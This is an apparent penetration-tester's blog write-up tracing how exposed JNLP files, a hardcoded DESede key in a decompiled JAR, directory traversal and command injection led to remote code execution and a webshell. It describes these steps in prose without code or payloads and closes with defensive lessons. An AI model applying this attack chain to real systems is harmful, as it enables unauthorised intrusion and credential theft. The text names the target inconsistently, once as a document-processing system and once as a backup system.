Keeping secrets safe inside applications has always felt like an endless game of cat and mouse – especially when it comes to desktop software. During a recent penetration test I stumbled into a chain that began with a JNLP file and ended with remote code execution against the system that orchestrated document-processing campaigns.
The root cause? A string of “small” design shortcuts that, when chained together, removed every meaningful layer of defense.
Step 1: Finding the JNLP file
A client-side workflow tool generated a fresh JNLP file every time a user modified a scenario graph. Those files were served from a predictable path on the web server without any authentication – an attacker only needed to guess the filename pattern.

The file exposed much more than UI metadata. It contained paths to XML definitions, the username used by the client, the base API URLs that controlled every scenario, two encrypted strings with API credentials and, most importantly, the name of a companion JAR file.
Step 2: Analyzing the JNLP payload
Downloading the JNLP file revealed how tightly coupled the client was with backend secrets. The configuration listed the exact location of the JAR that implemented the visual editor.


Armed with the JAR path, the next step was obvious: download the binary and peel back its layers.
Step 3: Reverse-engineering the JAR
Decompiler work quickly uncovered the ACCApplet class handling startup logic and the CryptionText helper responsible for decrypting API credentials.


The application relied on DESede (3DES) with a hardcoded key stored as a hexadecimal constant.

Combining the key with the encrypted strings from the JNLP produced reusable API credentials – the same ones used across the entire deployment.

Step 4: Reproducing API requests
The JAR also held a list of REST endpoints used by the client. With the decrypted credentials, I could impersonate the legitimate editor and replay every privileged API call.

I started with reconnaissance. Directory traversal worked out of the box; ../ sequences were never normalized.


Step 5: Happy hunting
The deeper I went, the clearer it became that the API trusted completely untrusted data.
- Reading
/proc/self/environleaked environment variables because the application piped the command throughgzipand returned the raw output. - Executing shell commands was possible through parameters that were never sanitized.


That behaviour opened the door to command injection and DNS-based exfiltration even in environments with outbound traffic restrictions.

Attackers could also upload arbitrary files via the putfile endpoint. With another traversal, that turned into a reliable webshell dropper inside the Tomcat webroot.


Conclusion: From secrets to system compromise
One “small” shortcut after another stacked until the entire security model collapsed:
- Exposed JNLP files leaked operational metadata without authentication.
- Hardcoded DESede keys made “encrypted” credentials meaningless.
- API endpoints trusted attacker-controlled input, enabling directory traversal and command injection.
- System commands executed with user-controlled parameters, turning the platform into an RCE factory.

What started as an innocuous configuration leak became a complete takeover of the backup orchestration system. Secrets deserve the same threat modelling as any other critical component – because once the door is open, attackers will never stop at a single credential.




